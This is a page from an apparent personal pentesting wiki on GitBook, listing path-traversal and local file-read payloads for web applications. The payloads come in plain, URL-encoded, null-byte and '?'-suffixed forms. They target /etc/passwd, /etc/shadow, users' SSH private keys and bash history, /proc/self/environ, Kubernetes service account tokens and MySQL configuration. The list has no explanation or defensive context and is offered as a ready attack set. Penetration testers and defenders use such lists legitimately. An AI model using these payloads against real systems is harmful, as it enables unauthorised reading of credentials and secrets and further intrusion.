AKUMA
  • README 🥷🏽
  • Red Teaming 👹
    • Loading 50% 😒
  • 👿BLUE TEAM
    • YARA rules
  • 📦Containers
    • DOCKER
      • Docker Security & Pentesting
        • Commond Docker error
      • 8 Best Practices for Docker Host Security
  • Windows Hardening 🛡️
    • Windows Active Directory Pentesting
      • Dll Hijacking
      • MSDT - Microsoft Support Diagnostic Tool Vulnerability
      • AD Enumeration TOOL
      • AD Certificate Templates
      • Kerberos Delegation
    • Windows Security Controls
      • Applocker Basics
    • Powershell Cheat sheet
    • AMSI Bypass
  • Linux Hardening 🛡️
    • Page 1
  • Network Services Pentesting
    • Footprinting Cheat sheet
      • 21-FTP
      • 161-SNMP
      • 445-SMB-139
      • 2049-NFS
      • 53-DNS
      • 587-SMTP
      • 143-IMAP/POP3
    • Juicy Curl
  • Pentesting Web
    • 100 Web Vulnerabilities, categorized into various types
    • Deserialization
      • Node.js Deserialization
    • SHODAN DORK
    • Vulnerabilities PAYLOADS
      • Directory Traversal Payload
      • Html-Injection-Read-FIle
      • Html-Injection
      • OS-Command-Injection
      • SQL-Injection-Auth-Bypass
      • PHP-Code-Injection
      • SQL-Injection
      • SSRF Basic
      • SSRF
      • XML-External-Entity
      • XSLT (eXtensible Stylesheet Language Transformations)
      • XSS Cheat Sheet
        • XSS
        • XSS -
        • XSS-polyglots
        • Cloudflare's XSS protection
    • Base Information
      • File-Extension-Inclusion
        • File-Inclusion-Windows
        • File-Inclusion-Linux
        • File-Extension
      • Media-Type-(MIME)
      • Windows-Sensitive-Files
      • Linux-Sensitive-Files
      • Linux-Log-Files
  • Blogs
    • How I Passed HTB Certified Penetration Testing Specialist
    • A comparative analysis of Open Source Web Application vulnerability scanners (Rana Khalil)
    • Sean Metcalfe Path for AD
    • Secure Docker - HackerSploit
  • Projects
    • HOME LAB
      • HOME LAB Blogs | Active Directory
        • Active Directory Lab Setup - 101
        • Active Directory Lab Setup - 102
        • Active Directory Lab Setup [ AD Enumeration ] - 103
        • Active Directory Lab Setup [AD Attacks ] - 104
      • Home Lab | Splunk Setup & Configuration
    • HOSTING A WEBSITE AND HARDENING ITS SECURITY
  • CTF- Writeups/ Solutions
    • HTB - Advanced Labs
      • Fortress
        • Jet
        • Akerva
        • Context
        • Synacktv
        • Faraday
        • AWS
      • Endgames
        • Ascension
        • RPG
        • Hades
        • Xen
        • P.O.O.
    • idekCTF 2024 🚩
    • TFC CTF 2024 🏳
    • DeadSec CTF 2024 🏴
      • Bing2 (web)
      • Mic_check (misc)
      • Windows Server (OSINT)
    • ImaginaryCTF 2024 🚩
      • cartesian-1 [Forensics]
      • packed [FORENSICS]
      • bom [FORENSICS]
      • BANK [MISC]
    • NahamCon CTF 2024 🏳
      • all WARMUPs
      • Base3200
      • The Hacker Webstore
      • iDoor
      • All About Robots
      • Thomas DEVerson
      • Helpful Desk
      • Curly Fries
    • Cyber Apocalypse 2024: Hacker Royale 🏴
      • Unbreakable [MISC]
      • StopDropAndRoll [MISC]
      • Character [MISC]
      • Delulu [pwn]
      • Tutorial [pwn]
      • Maze [Hardware]
      • TimeKORP [web]
  • Tools
    • Content Discovery & Form Manipulation
      • ffuf
      • RustScan
      • Feroxbuster
      • Dirsearch
      • Gobuster
      • Wfuzz
      • Webshell
      • websocket
Powered by GitBook
On this page
  1. Pentesting Web
  2. Vulnerabilities PAYLOADS

Html-Injection-Read-FIle

/etc/passwd
/etc/passwd%00
/etc/passwd?
%2Fetc%2Fpasswd
%2Fetc%2Fpasswd%2500
%2Fetc%2Fpasswd%3F
../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../etc/passwd%00
../../../../../../etc/passwd?
....//....//....//....//....//....//....//etc/passwd%00
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%2500
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%3F
/etc/knockd.conf
%2Fetc%2Fknockd.conf
../../../../../../etc/knockd.conf
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fknockd.conf
/etc/issue
%2Fetc%2Fissue
../../../../../../etc/issue
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fissue
/etc/shadow
%2Fetc%2Fshadow
../../../../../../etc/shadow
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
/etc/group
%2Fetc%2Fgroup
../../../../../../etc/group
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup
/etc/hosts
%2Fetc%2Fhosts
../../../../../../etc/hosts
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhosts
/etc/motd
%2Fetc%2Fmotd
../../../../../../etc/motd
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fmotd
/etc/mysql/my.cnf
%2Fetc%2Fmysql%2Fmy.cnf
../../../../../../etc/mysql/my.cnf
..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fmysql%2Fmy.cnf
/proc/[0-9]*/fd/[0-9]*
%2Fproc%2F%5B0-9%5D*%2Ffd%2F%5B0-9%5D*
../../../../../../proc/[0-9]*/fd/[0-9]*
..%2F..%2F..%2F..%2F..%2F..%2Fproc%2F%5B0-9%5D*%2Ffd%2F%5B0-9%5D*
/proc/self/environ
%2Fproc%2Fself%2Fenviron
../../../../../../proc/self/environ
..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
/proc/version
%2Fproc%2Fversion
../../../../../../proc/version
..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion
/proc/cmdline
%2Fproc%2Fcmdline
../../../../../../proc/cmdline
..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fcmdline
/proc/sched_debug
%2Fproc%2Fsched_debug
../../../../../../proc/sched_debug
..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fsched_debug
/proc/mounts
%2Fproc%2Fmounts
../../../../../../proc/mounts
..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fmounts
/proc/net/arp
%2Fproc%2Fnet%2Farp
../../../../../../proc/net/arp
..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fnet%2Farp
/proc/net/route
%2Fproc%2Fnet%2Froute
../../../../../../proc/net/route
..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fnet%2Froute
/proc/net/tcp
%2Fproc%2Fnet%2Ftcp
../../../../../../proc/net/tcp
..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fnet%2Ftcp
/home/$USER/.bash_history
%2Fhome%2F%24USER%2F.bash_history
../../../../../../home/$USER/.bash_history
..%2F..%2F..%2F..%2F..%2F..%2Fhome%2F%24USER%2F.bash_history
/home/$USER/.ssh/id_rsa
%2Fhome%2F%24USER%2F.ssh%2Fid_rsa
../../../../../../home/$USER/.ssh/id_rsa
..%2F..%2F..%2F..%2F..%2F..%2Fhome%2F%24USER%2F.ssh%2Fid_rsa
/run/secrets/kubernetes.io/serviceaccount/token
%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceaccount%2Ftoken
../../../../../../run/secrets/kubernetes.io/serviceaccount/token
..%2F..%2F..%2F..%2F..%2F..%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceaccount%2Ftoken
/var/lib/mlocate/mlocate.db
%2Fvar%2Flib%2Fmlocate%2Fmlocate.db
../../../../../../var/lib/mlocate/mlocate.db
..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fmlocate%2Fmlocate.db
/var/lib/mlocate.db
%2Fvar%2Flib%2Fmlocate.db
../../../../../../var/lib/mlocate.db
..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fmlocate.db
PreviousDirectory Traversal PayloadNextHtml-Injection

Last updated 9 months ago